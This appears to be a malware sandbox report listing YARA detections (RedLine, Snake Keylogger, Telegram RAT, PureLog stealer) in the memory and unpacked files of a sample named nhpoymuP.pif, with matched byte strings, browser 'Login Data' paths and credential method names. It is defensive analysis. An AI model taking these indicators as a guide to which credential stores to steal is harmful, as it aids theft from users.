00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
0000000E.00000001.1913774017.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.2945858419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f1e2:$a1: get_encryptedPassword 0x3f1b6:$a2: get_encryptedUsername 0x3f27a:$a3: get_timePasswordChanged 0x3f192:$a4: get_passwordField 0x3f1f8:$a5: set_encryptedPassword 0x3efc5:$a7: get_logins 0x3a612:$a10: KeyLoggerEventArgs 0x3a5e1:$a11: KeyLoggerEventArgsEventHandler 0x3f099:$a13: _encryptedPassword
00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f4da:$a1: get_encryptedPassword 0x3f4ae:$a2: get_encryptedUsername 0x3f572:$a3: get_timePasswordChanged 0x3f48a:$a4: get_passwordField 0x3f4f0:$a5: set_encryptedPassword 0x3f2bd:$a7: get_logins 0x3a90a:$a10: KeyLoggerEventArgs 0x3a8d9:$a11: KeyLoggerEventArgsEventHandler 0x3f391:$a13: _encryptedPassword
00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7416	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2952d:$a1: get_encryptedPassword 0x3b8fb:$a1: get_encryptedPassword 0x582ac:$a1: get_encryptedPassword 0xa556b:$a1: get_encryptedPassword 0xc9604:$a1: get_encryptedPassword 0x29501:$a2: get_encryptedUsername 0x3b8cf:$a2: get_encryptedUsername 0x58280:$a2: get_encryptedUsername 0xa553f:$a2: get_encryptedUsername 0xc95d8:$a2: get_encryptedUsername 0x295c5:$a3: get_timePasswordChanged 0x3b993:$a3: get_timePasswordChanged 0x58344:$a3: get_timePasswordChanged 0xa5603:$a3: get_timePasswordChanged 0xc969c:$a3: get_timePasswordChanged 0x294dd:$a4: get_passwordField 0x3b8ab:$a4: get_passwordField 0x5825c:$a4: get_passwordField 0xa551b:$a4: get_passwordField 0xc95b4:$a4: get_passwordField 0x29543:$a5: set_encryptedPassword
Process Memory Space: nhpoymuP.pif PID: 7688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7688	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7688	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nhpoymuP.pif PID: 7688	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1f7033:$a1: get_encryptedPassword 0x284d0f:$a1: get_encryptedPassword 0x2c501f:$a1: get_encryptedPassword 0x34842c:$a1: get_encryptedPassword 0x1f7007:$a2: get_encryptedUsername 0x284ce3:$a2: get_encryptedUsername 0x2c4ff3:$a2: get_encryptedUsername 0x348400:$a2: get_encryptedUsername 0x1f70cb:$a3: get_timePasswordChanged 0x284da7:$a3: get_timePasswordChanged 0x2c50b7:$a3: get_timePasswordChanged 0x3484c4:$a3: get_timePasswordChanged 0x1f6fe3:$a4: get_passwordField 0x284cbf:$a4: get_passwordField 0x2c4fcf:$a4: get_passwordField 0x3483dc:$a4: get_passwordField 0x1f7049:$a5: set_encryptedPassword 0x284d25:$a5: set_encryptedPassword 0x2c5035:$a5: set_encryptedPassword 0x348442:$a5: set_encryptedPassword 0x1f6e1f:$a7: get_logins
Process Memory Space: nhpoymuP.pif PID: 8008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nhpoymuP.pif PID: 8008	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: nhpoymuP.pif PID: 8008	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nhpoymuP.pif PID: 8008	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x217fa:$a1: get_encryptedPassword 0x3bbd4:$a1: get_encryptedPassword 0x9b15f:$a1: get_encryptedPassword 0x2dc37c:$a1: get_encryptedPassword 0x217ce:$a2: get_encryptedUsername 0x3bba8:$a2: get_encryptedUsername 0x9b133:$a2: get_encryptedUsername 0x2dc350:$a2: get_encryptedUsername 0x21892:$a3: get_timePasswordChanged 0x3bc6c:$a3: get_timePasswordChanged 0x9b1f7:$a3: get_timePasswordChanged 0x2dc414:$a3: get_timePasswordChanged 0x217aa:$a4: get_passwordField 0x3bb84:$a4: get_passwordField 0x9b10f:$a4: get_passwordField 0x2dc32c:$a4: get_passwordField 0x21810:$a5: set_encryptedPassword 0x3bbea:$a5: set_encryptedPassword 0x9b175:$a5: set_encryptedPassword 0x2dc392:$a5: set_encryptedPassword 0x215e6:$a7: get_logins
Click to see the 106 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.1.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.1.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.1.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.1.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.1.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.nhpoymuP.pif.28470000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.28470000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.nhpoymuP.pif.28470000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.28470000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.28470000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.nhpoymuP.pif.28470000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
14.2.nhpoymuP.pif.28470000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.28470000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.31c30000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.31c30000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.31c30000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
3.2.nhpoymuP.pif.31c30000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.31c30000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.nhpoymuP.pif.31c30ee8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.31c30ee8.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.31c30ee8.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.2.nhpoymuP.pif.27840000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27840000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27840000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27840000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27840000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27840000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
